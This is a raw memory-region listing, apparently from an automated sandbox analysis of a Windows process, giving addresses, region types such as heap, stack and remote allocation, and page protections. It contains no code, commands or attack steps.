page read and write
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
8AAC000
|
stack
|
page read and write
|
||
|
6C6E000
|
stack
|
page read and write
|
||
|
25F20000
|
heap
|
page read and write
|
||
|
53D3000
|
trusted library allocation
|
page read and write
|
||
|
20473212000
|
heap
|
page read and write
|
||
|
20472E52000
|
heap
|
page read and write
|
||
|
293D000
|
stack
|
page read and write
|
||
|
7910000
|
trusted library allocation
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
25E00000
|
heap
|
page execute and read and write
|
||
|
A56E000
|
heap
|
page read and write
|
||
|
2045CC36000
|
trusted library allocation
|
page read and write
|
||
|
32F9000
|
trusted library allocation
|
page read and write
|
||
|
2872E000
|
stack
|
page read and write
|
||
|
25B5F000
|
stack
|
page read and write
|
||
|
2F8F000
|
unkown
|
page read and write
|
||
|
7BDB000
|
stack
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
4B98000
|
trusted library allocation
|
page read and write
|
||
|
204731A8000
|
heap
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
2045B2DC000
|
trusted library allocation
|
page read and write
|
||
|
25590000
|
direct allocation
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
D236000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
2045C0E8000
|
trusted library allocation
|
page read and write
|
||
|
2813E000
|
stack
|
page read and write
|
||
|
8B8E000
|
stack
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
|
28490000
|
trusted library allocation
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
204592A0000
|
heap
|
page read and write
|
||
|
25E58000
|
trusted library allocation
|
page read and write
|
||
|
7940000
|
trusted library allocation
|
page read and write
|
||
|
8567000
|
stack
|
page read and write
|
||
|
3149000
|
heap
|
page read and write
|
||
|
204731EB000
|
heap
|
page read and write
|
||
|
20472FB2000
|
heap
|
page read and write
|
||
|
25F00000
|
trusted library allocation
|
page read and write
|
||
|
2045CC1B000
|
trusted library allocation
|
page read and write
|
||
|
71FD000
|
stack
|
page read and write
|
||
|
3262000
|
trusted library allocation
|
page read and write
|
||
|
878C000
|
heap
|
page read and write
|
||
|
7250000
|
direct allocation
|
page read and write
|
||
|
2045CD1E000
|
trusted library allocation
|
page read and write
|
||
|
7A4E000
|
stack
|
page read and write
|
||
|
533A000
|
trusted library allocation
|
page read and write
|
||
|
286ED000
|
stack
|
page read and write
|
||
|
87C6000
|
heap
|
page read and write
|
||
|
A6B0000
|
direct allocation
|
page read and write
|
||
|
7165000
|
heap
|
page execute and read and write
|
||
|
A552000
|
heap
|
page read and write
|
||
|
A415000
|
heap
|
page read and write
|
||
|
5BF9000
|
trusted library allocation
|
page read and write
|
||
|
20473081000
|
heap
|
page read and write
|
||
|
7F140000
|
trusted library allocation
|
page execute and read and write
|
||
|
32C0000
|
trusted library section
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
28030000
|
trusted library allocation
|
page read and write
|
||
|
2045A9D0000
|
heap
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
28351000
|
heap
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
260E8000
|
trusted library allocation
|
page read and write
|
||
|
29EE000
|
unkown
|
page read and write
|
||
|
2045A960000
|
trusted library allocation
|
page read and write
|
||
|
308E000
|
stack
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
|
20459075000
|
heap
|
page read and write
|
||
|
8AEE000
|
stack
|
page read and write
|
||
|
199A82B0000
|
heap
|
page read and write
|
||
|
A650000
|
direct allocation
|
page read and write
|
||
|
A57F000
|
heap
|
page read and write
|
||
|
4C57000
|
trusted library allocation
|
page read and write
|
||
|
7A0E000
|
stack
|
page read and write
|
||
|
25D97000
|
stack
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
20473188000
|
heap
|
page read and write
|
||
|
28450000
|
trusted library allocation
|
page read and write
|
||
|
95E6000
|
remote allocation
|
page execute and read and write
|
||
|
A578000
|
heap
|
page read and write
|
||
|
20459280000
|
trusted library allocation
|
page read and write
|
||
|
20472FFF000
|
heap
|
page read and write
|
||
|
870C000
|
stack
|
page read and write
|
||
|
2045B30A000
|
trusted library allocation
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
28450000
|
trusted library allocation
|
page read and write
|
||
|
3186000
|
heap
|
page read and write
|
||
|
A606000
|
heap
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
A60B000
|
heap
|
page read and write
|
||
|
5EA0000
|
trusted library allocation
|
page read and write
|
||
|
3230000
|
trusted library allocation
|
page read and write
|
||
|
20458F00000
|
heap
|
page read and write
|
||
|
A4F0000
|
direct allocation
|
page read and write
|
||
|
284A0000
|
trusted library allocation
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
32D0000
|
trusted library allocation
|
page read and write
|
||
|
25F00000
|
trusted library allocation
|
page read and write
|
||
|
28460000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
2045B68E000
|
trusted library allocation
|
page read and write
|
||
|
E3C000
|
stack
|
page read and write
|
||
|
2045CBFE000
|
trusted library allocation
|
page read and write
|
||
|
862E000
|
stack
|
page read and write
|
||
|
28350000
|
heap
|
page read and write
|
||
|
20472FAE000
|
heap
|
page read and write
|
||
|
28E9C000
|
stack
|
page read and write
|
||
|
28251000
|
heap
|
page read and write
|
||
|
2599F000
|
stack
|
page read and write
|
||
|
25A5D000
|
stack
|
page read and write
|
||
|
28040000
|
trusted library allocation
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
20458F70000
|
heap
|
page read and write
|
||
|
25A1D000
|
stack
|
page read and write
|
||
|
2045CC1F000
|
trusted library allocation
|
page read and write
|
||
|
72A0000
|
direct allocation
|
page read and write
|
||
|
28460000
|
trusted library allocation
|
page read and write
|
||
|
8794000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
2045AE07000
|
heap
|
page execute and read and write
|
||
|
8B2D000
|
stack
|
page read and write
|
||
|
2045AEDD000
|
trusted library allocation
|
page read and write
|
||
|
DC36000
|
direct allocation
|
page execute and read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
A49E000
|
stack
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
3340000
|
heap
|
page read and write
|
||
|
2045A8E0000
|
heap
|
page readonly
|
||
|
3155000
|
heap
|
page read and write
|
||
|
28460000
|
trusted library allocation
|
page read and write
|
||
|
25F10000
|
heap
|
page execute and read and write
|
||
|
2047321F000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
20473060000
|
heap
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
A6C0000
|
heap
|
page read and write
|
||
|
9FE6000
|
remote allocation
|
page execute and read and write
|
||
|
3310000
|
trusted library allocation
|
page read and write
|
||
|
25A9C000
|
stack
|
page read and write
|
||
|
2817D000
|
stack
|
page read and write
|
||
|
B436000
|
direct allocation
|
page execute and read and write
|
||
|
284B0000
|
trusted library allocation
|
page read and write
|
||
|
7F380000
|
trusted library allocation
|
page execute and read and write
|
||
|
334B000
|
heap
|
page read and write
|
||
|
4B80000
|
heap
|
page readonly
|
||
|
3196000
|
heap
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
28460000
|
trusted library allocation
|
page read and write
|
||
|
32B8000
|
heap
|
page read and write
|
||
|
25F00000
|
trusted library allocation
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
323D000
|
trusted library allocation
|
page execute and read and write
|
||
|
204590BF000
|
heap
|
page read and write
|
||
|
A5CE000
|
heap
|
page read and write
|
||
|
7AC0000
|
heap
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
2045B6C5000
|
trusted library allocation
|
page read and write
|
||
|
4500000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
69263FD000
|
stack
|
page read and write
|
||
|
284B0000
|
trusted library allocation
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
A45E000
|
stack
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
25F67000
|
trusted library allocation
|
page read and write
|
||
|
712E000
|
stack
|
page read and write
|
||
|
5C01000
|
trusted library allocation
|
page read and write
|
||
|
A57F000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
25DF9000
|
trusted library allocation
|
page read and write
|
||
|
72B0000
|
direct allocation
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
20458F40000
|
heap
|
page read and write
|
||
|
20473243000
|
heap
|
page read and write
|
||
|
28029000
|
stack
|
page read and write
|
||
|
3240000
|
trusted library allocation
|
page read and write
|
||
|
6926275000
|
stack
|
page read and write
|
||
|
3300000
|
trusted library allocation
|
page read and write
|
||
|
45E6000
|
remote allocation
|
page execute and read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
25AD0000
|
trusted library allocation
|
page read and write
|
||
|
AA36000
|
direct allocation
|
page execute and read and write
|
||
|
2835B000
|
heap
|
page read and write
|
||
|
2045CC11000
|
trusted library allocation
|
page read and write
|
||
|
199A8260000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
692657E000
|
stack
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
28351000
|
heap
|
page read and write
|
||
|
20473233000
|
heap
|
page read and write
|
||
|
5C19000
|
trusted library allocation
|
page read and write
|
||
|
8BE6000
|
remote allocation
|
page execute and read and write
|
||
|
77D0000
|
heap
|
page read and write
|
||
|
8750000
|
heap
|
page read and write
|
||
|
2045907A000
|
heap
|
page read and write
|
||
|
A5D2000
|
heap
|
page read and write
|
||
|
28450000
|
trusted library allocation
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
28040000
|
trusted library allocation
|
page read and write
|
||
|
2045A8F0000
|
trusted library allocation
|
page read and write
|
||
|
86C5000
|
trusted library allocation
|
page read and write
|
||
|
6DE6000
|
remote allocation
|
page execute and read and write
|
||
|
540E000
|
trusted library allocation
|
page read and write
|
||
|
28226000
|
trusted library allocation
|
page read and write
|
||
|
A310000
|
heap
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
2045CC50000
|
trusted library allocation
|
page read and write
|
||
|
7270000
|
direct allocation
|
page read and write
|
||
|
E78000
|
stack
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
204731AA000
|
heap
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
28460000
|
trusted library allocation
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
28030000
|
trusted library allocation
|
page read and write
|
||
|
30CC000
|
heap
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
2046AE5F000
|
trusted library allocation
|
page read and write
|
||
|
A64E000
|
stack
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
20472FA9000
|
heap
|
page read and write
|
||
|
A690000
|
direct allocation
|
page read and write
|
||
|
63E6000
|
remote allocation
|
page execute and read and write
|
||
|
326B000
|
trusted library allocation
|
page execute and read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
28458000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
69268B8000
|
stack
|
page read and write
|
||
|
20458EE0000
|
heap
|
page read and write
|
||
|
8C20000
|
direct allocation
|
page read and write
|
||
|
7950000
|
trusted library allocation
|
page read and write
|
||
|
26F31000
|
trusted library allocation
|
page read and write
|
||
|
8630000
|
heap
|
page read and write
|
||
|
204731E3000
|
heap
|
page read and write
|
||
|
2045B2C8000
|
trusted library allocation
|
page read and write
|
||
|
20459096000
|
heap
|
page read and write
|
||
|
53BF000
|
trusted library allocation
|
page read and write
|
||
|
20473266000
|
heap
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
26F59000
|
trusted library allocation
|
page read and write
|
||
|
259DE000
|
stack
|
page read and write
|
||
|
3220000
|
trusted library allocation
|
page read and write
|
||
|
4BF1000
|
trusted library allocation
|
page read and write
|
||
|
20472F60000
|
heap
|
page read and write
|
||
|
20472FF9000
|
heap
|
page read and write
|
||
|
284C0000
|
trusted library allocation
|
page read and write
|
||
|
9550000
|
direct allocation
|
page execute and read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
28250000
|
heap
|
page read and write
|
||
|
77E9000
|
heap
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
3158000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
8B30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
28221000
|
trusted library allocation
|
page read and write
|
||
|
28050000
|
heap
|
page read and write
|
||
|
28450000
|
trusted library allocation
|
page read and write
|
||
|
28373000
|
heap
|
page read and write
|
||
|
3234000
|
trusted library allocation
|
page read and write
|
||
|
30B0000
|
trusted library section
|
page read and write
|
||
|
2045B347000
|
trusted library allocation
|
page read and write
|
||
|
204590C4000
|
heap
|
page read and write
|
||
|
75FE000
|
stack
|
page read and write
|
||
|
2045B50B000
|
trusted library allocation
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
324D000
|
trusted library allocation
|
page execute and read and write
|
||
|
A6C7000
|
heap
|
page read and write
|
||
|
2E0E000
|
stack
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
8C50000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
692667C000
|
stack
|
page read and write
|
||
|
2046B14E000
|
trusted library allocation
|
page read and write
|
||
|
F036000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
2047317C000
|
heap
|
page read and write
|
||
|
53FB000
|
trusted library allocation
|
page read and write
|
||
|
692647E000
|
stack
|
page read and write
|
||
|
28040000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
|
3250000
|
trusted library allocation
|
page read and write
|
||
|
2045CC23000
|
trusted library allocation
|
page read and write
|
||
|
E636000
|
direct allocation
|
page execute and read and write
|
||
|
A604000
|
heap
|
page read and write
|
||
|
763E000
|
stack
|
page read and write
|
||
|
3256000
|
trusted library allocation
|
page execute and read and write
|
||
|
6773CFD000
|
stack
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
7A8D000
|
stack
|
page read and write
|
||
|
8798000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
28460000
|
trusted library allocation
|
page read and write
|
||
|
7900000
|
trusted library allocation
|
page read and write
|
||
|
2045907C000
|
heap
|
page read and write
|
||
|
8640000
|
trusted library allocation
|
page execute and read and write
|
||
|
6926B3B000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
32B0000
|
heap
|
page read and write
|
||
|
5C5D000
|
trusted library allocation
|
page read and write
|
||
|
A660000
|
direct allocation
|
page read and write
|
||
|
A500000
|
direct allocation
|
page read and write
|
||
|
A417000
|
heap
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
E7D000
|
stack
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page read and write
|
||
|
2595E000
|
stack
|
page read and write
|
||
|
A585000
|
heap
|
page read and write
|
||
|
2045B6D1000
|
trusted library allocation
|
page read and write
|
||
|
8720000
|
trusted library allocation
|
page read and write
|
||
|
304E000
|
stack
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
5348000
|
trusted library allocation
|
page read and write
|
||
|
32F0000
|
trusted library allocation
|
page read and write
|
||
|
25FF2000
|
trusted library allocation
|
page read and write
|
||
|
25F00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
|
A5C0000
|
heap
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
A4E0000
|
heap
|
page readonly
|
||
|
26F95000
|
trusted library allocation
|
page read and write
|
||
|
C836000
|
direct allocation
|
page execute and read and write
|
||
|
284A0000
|
trusted library allocation
|
page read and write
|
||
|
2045B684000
|
trusted library allocation
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
733A000
|
stack
|
page read and write
|
||
|
25F00000
|
trusted library allocation
|
page read and write
|
||
|
A5E8000
|
heap
|
page read and write
|
||
|
28035000
|
trusted library allocation
|
page read and write
|
||
|
2045ADE0000
|
heap
|
page execute and read and write
|
||
|
2045CDA3000
|
trusted library allocation
|
page read and write
|
||
|
2045B6B0000
|
trusted library allocation
|
page read and write
|
||
|
A3F0000
|
heap
|
page read and write
|
||
|
2046B13F000
|
trusted library allocation
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
2045CE91000
|
trusted library allocation
|
page read and write
|
||
|
7960000
|
heap
|
page execute and read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
32E4000
|
trusted library allocation
|
page read and write
|
||
|
2822D000
|
trusted library allocation
|
page read and write
|
||
|
20458FD0000
|
heap
|
page read and write
|
||
|
2045B6E8000
|
trusted library allocation
|
page read and write
|
||
|
723B000
|
stack
|
page read and write
|
||
|
28200000
|
trusted library allocation
|
page read and write
|
||
|
2045A8D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
|
4BC0000
|
trusted library allocation
|
page read and write
|
||
|
199A83B0000
|
heap
|
page read and write
|
||
|
199A84B5000
|
heap
|
page read and write
|
||
|
7831000
|
heap
|
page read and write
|
||
|
25DE0000
|
trusted library allocation
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page execute and read and write
|
||
|
2045CCA3000
|
trusted library allocation
|
page read and write
|
||
|
2045AE00000
|
heap
|
page execute and read and write
|
||
|
8580000
|
trusted library allocation
|
page read and write
|
||
|
538A000
|
trusted library allocation
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
2045B2E4000
|
trusted library allocation
|
page read and write
|
||
|
6773DFF000
|
unkown
|
page read and write
|
||
|
5BF1000
|
trusted library allocation
|
page read and write
|
||
|
A670000
|
direct allocation
|
page read and write
|
||
|
8788000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
30C0000
|
heap
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
27FEA000
|
stack
|
page read and write
|
||
|
7160000
|
heap
|
page execute and read and write
|
||
|
25EF0000
|
trusted library allocation
|
page read and write
|
||
|
28353000
|
heap
|
page read and write
|
||
|
28040000
|
trusted library allocation
|
page read and write
|
||
|
69269BE000
|
stack
|
page read and write
|
||
|
28212000
|
trusted library allocation
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
|
25C8E000
|
stack
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
2FFB000
|
heap
|
page read and write
|
||
|
2045B690000
|
trusted library allocation
|
page read and write
|
||
|
25DF5000
|
trusted library allocation
|
page read and write
|
||
|
A5C4000
|
heap
|
page read and write
|
||
|
3330000
|
trusted library allocation
|
page read and write
|
||
|
28470000
|
heap
|
page read and write
|
||
|
2045B672000
|
trusted library allocation
|
page read and write
|
||
|
2820E000
|
trusted library allocation
|
page read and write
|
||
|
A5E8000
|
heap
|
page read and write
|
||
|
5362000
|
trusted library allocation
|
page read and write
|
||
|
792A000
|
trusted library allocation
|
page read and write
|
||
|
8770000
|
heap
|
page read and write
|
||
|
2821A000
|
trusted library allocation
|
page read and write
|
||
|
20473009000
|
heap
|
page read and write
|
||
|
28363000
|
heap
|
page read and write
|
||
|
2047323C000
|
heap
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
28351000
|
heap
|
page read and write
|
||
|
27FAE000
|
stack
|
page read and write
|
||
|
2045AA05000
|
heap
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
30FF000
|
heap
|
page read and write
|
||
|
25B1E000
|
stack
|
page read and write
|
||
|
4BB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
25900000
|
heap
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
53D9000
|
trusted library allocation
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
28037000
|
trusted library allocation
|
page read and write
|
||
|
7340000
|
heap
|
page read and write
|
||
|
2045905C000
|
heap
|
page read and write
|
||
|
2876D000
|
stack
|
page read and write
|
||
|
A4DD000
|
stack
|
page read and write
|
||
|
A518000
|
heap
|
page read and write
|
||
|
9636000
|
direct allocation
|
page execute and read and write
|
||
|
2045B07D000
|
trusted library allocation
|
page read and write
|
||
|
5397000
|
trusted library allocation
|
page read and write
|
||
|
4D4B000
|
trusted library allocation
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
3312000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
8BD0000
|
trusted library allocation
|
page read and write
|
||
|
784A000
|
heap
|
page read and write
|
||
|
20473257000
|
heap
|
page read and write
|
||
|
25BAD000
|
stack
|
page read and write
|
||
|
535C000
|
trusted library allocation
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
4B7F000
|
stack
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
A584000
|
heap
|
page read and write
|
||
|
28E1C000
|
stack
|
page read and write
|
||
|
281F9000
|
stack
|
page read and write
|
||
|
2045CC8D000
|
trusted library allocation
|
page read and write
|
||
|
281BC000
|
stack
|
page read and write
|
||
|
32E0000
|
trusted library allocation
|
page read and write
|
||
|
6926A3C000
|
stack
|
page read and write
|
||
|
25BEE000
|
stack
|
page read and write
|
||
|
692758E000
|
stack
|
page read and write
|
||
|
77E6000
|
remote allocation
|
page execute and read and write
|
||
|
25C50000
|
remote allocation
|
page read and write
|
||
|
6773EFF000
|
stack
|
page read and write
|
||
|
3315000
|
trusted library allocation
|
page execute and read and write
|
||
|
8C10000
|
direct allocation
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
2045AE51000
|
trusted library allocation
|
page read and write
|
||
|
59E6000
|
remote allocation
|
page execute and read and write
|
||
|
69267B6000
|
stack
|
page read and write
|
||
|
2045C713000
|
trusted library allocation
|
page read and write
|
||
|
330A000
|
trusted library allocation
|
page execute and read and write
|
||
|
69262BF000
|
stack
|
page read and write
|
||
|
25D00000
|
direct allocation
|
page read and write
|
||
|
7260000
|
direct allocation
|
page read and write
|
||
|
199A84B4000
|
heap
|
page read and write
|
||
|
3243000
|
trusted library allocation
|
page read and write
|
||
|
72FD000
|
stack
|
page read and write
|
||
|
7240000
|
direct allocation
|
page read and write
|
||
|
287AE000
|
stack
|
page read and write
|
||
|
A510000
|
heap
|
page read and write
|
||
|
2045B34B000
|
trusted library allocation
|
page read and write
|
||
|
7290000
|
direct allocation
|
page read and write
|
||
|
8C40000
|
direct allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20472FB7000
|
heap
|
page read and write
|
||
|
25C50000
|
remote allocation
|
page read and write
|
||
|
27F6C000
|
stack
|
page read and write
|
||
|
A6A0000
|
direct allocation
|
page read and write
|
||
|
2045CC92000
|
trusted library allocation
|
page read and write
|
||
|
BE36000
|
direct allocation
|
page execute and read and write
|
||
|
8740000
|
heap
|
page read and write
|
||
|
28460000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
702E000
|
stack
|
page read and write
|
||
|
25E4E000
|
stack
|
page read and write
|
||
|
199A8240000
|
heap
|
page read and write
|
||
|
20458FDD000
|
heap
|
page read and write
|
||
|
692750F000
|
stack
|
page read and write
|
||
|
2045CBFA000
|
trusted library allocation
|
page read and write
|
||
|
28367000
|
heap
|
page read and write
|
||
|
2045B2D1000
|
trusted library allocation
|
page read and write
|
||
|
25CCF000
|
stack
|
page read and write
|
||
|
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
6926ABE000
|
stack
|
page read and write
|
||
|
284C0000
|
trusted library allocation
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
79CE000
|
stack
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
25D10000
|
direct allocation
|
page read and write
|
||
|
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
|
32E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
A608000
|
heap
|
page read and write
|
||
|
77FA000
|
heap
|
page read and write
|
||
|
692768A000
|
stack
|
page read and write
|
||
|
30F3000
|
heap
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
7920000
|
trusted library allocation
|
page read and write
|
||
|
70AF000
|
stack
|
page read and write
|
||
|
204590BD000
|
heap
|
page read and write
|
||
|
28F80000
|
trusted library allocation
|
page read and write
|
||
|
7DF4CF160000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A6E000
|
stack
|
page read and write
|
||
|
25D5B000
|
stack
|
page read and write
|
||
|
7907000
|
trusted library allocation
|
page read and write
|
||
|
28EDE000
|
stack
|
page read and write
|
||
|
8BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
28356000
|
heap
|
page read and write
|
||
|
2045AE40000
|
heap
|
page execute and read and write
|
||
|
199A8160000
|
heap
|
page read and write
|
||
|
28F70000
|
trusted library allocation
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
204592A5000
|
heap
|
page read and write
|
||
|
199A84B0000
|
heap
|
page read and write
|
||
|
8650000
|
trusted library allocation
|
page read and write
|
||
|
25F00000
|
trusted library allocation
|
page read and write
|
||
|
3233000
|
trusted library allocation
|
page execute and read and write
|
||
|
5401000
|
trusted library allocation
|
page read and write
|
There are 614 hidden memdumps, click here to show them.